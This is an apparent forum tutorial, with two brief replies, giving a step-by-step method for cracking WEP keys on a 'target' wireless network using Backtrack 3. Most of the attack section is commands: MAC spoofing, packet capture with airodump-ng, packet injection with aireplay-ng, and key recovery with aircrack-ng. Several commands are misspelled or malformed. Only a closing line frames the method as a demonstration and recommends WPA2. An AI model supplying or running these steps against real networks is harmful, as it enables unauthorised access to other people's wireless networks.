Cracking WEP Keys Using Backtrack 3

Requirements:

*Compact Disc.
*ISO Image of Backtrack 3.
*A PC with minimum 128MB RAM & 400Mhz Processor.
*Wireless Adapter.

Getting Started.
(1) Live CD of Backtrack 3 Download Torrent Here

(2)Run the torrent and download the .ISO image.When you have the ISO image burn it on 700mb Compact Disc using any CD Burning application i recommend Nero8 which can be downloaded here

Now lets assume you fulfill all the requirements, Now you are ready to start cracking the WEP Key.
Boot your computer from the live cd you just created.As soon as you see the desktop,move forwardto the step 1.

Step 1 Preparing the Wireless Card.

Note***
if you have any problems in this step for example enabling the card,disabling etc.You can skip this step and quickly move to step 2.


First we must enable “Monitor Mode” on the wifi card. If using the Intel PRO/Wireless
3945ABG chipset issue the following commands in the shell :
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your
computer. Next we must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig down [interface]
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:
airmon-ng start [device]

Step 2 Attacking the target


It is now time to locate a suitable WEP enabled network to work with.
Open the shell and issue the following command.

airodump-ng (device) 'device' can be wlan0 or rausb0.You can find the device by ifconfig command

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target
network. Now we must start collecting data from the WIFI access point for the attack:
Now enter CTRL+C to stop the monitoring and enter the following command

airodump-ng -c [channel] -w [wep.cap] –bssid [bssid] [device]

remember "wep.cap" is the file for storing packets,we will be using this at the last step for cracking.

Open another shell and leave the previous command running. Now we need to generate
some fake packets to the access point to speed up the data output. Test the access point by
issuing the following command:

aireplay-ng -1 0 -a [bssid] -h [mac address of ur card] -e [essid] [device]

you can find out your wireless adapter's MAC address by using ifconfig command.

If you see a message "Authentication Successful" this means the command was successful.
If this command is successful we will now generate many packets on the target network
so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h [mac address] [device]

This will force the access point to send out a bunch of packets which we can then use to
crack the WEP key. Check your aerodump-ng shell and you should see the “data” section
filling up with packets.

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other
hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h [mac address] [device]

Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing
the value of N to 64
[Filename] is the name we used in 2nd step "wep".

Once the crack is successful you will be left with the KEY! Remove the ':' from the output
and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a bad idea. I
suggest you use WPA2 encryption on your wireless networks. Goodluck!

Nice tut. Thanks for that.

BT 3 is running very nice on my beatiful, lovely Linux but I have such troubles to install the BT 4and I have no idea why isn't working. Did you tried the BT 4 already? Is it working for you?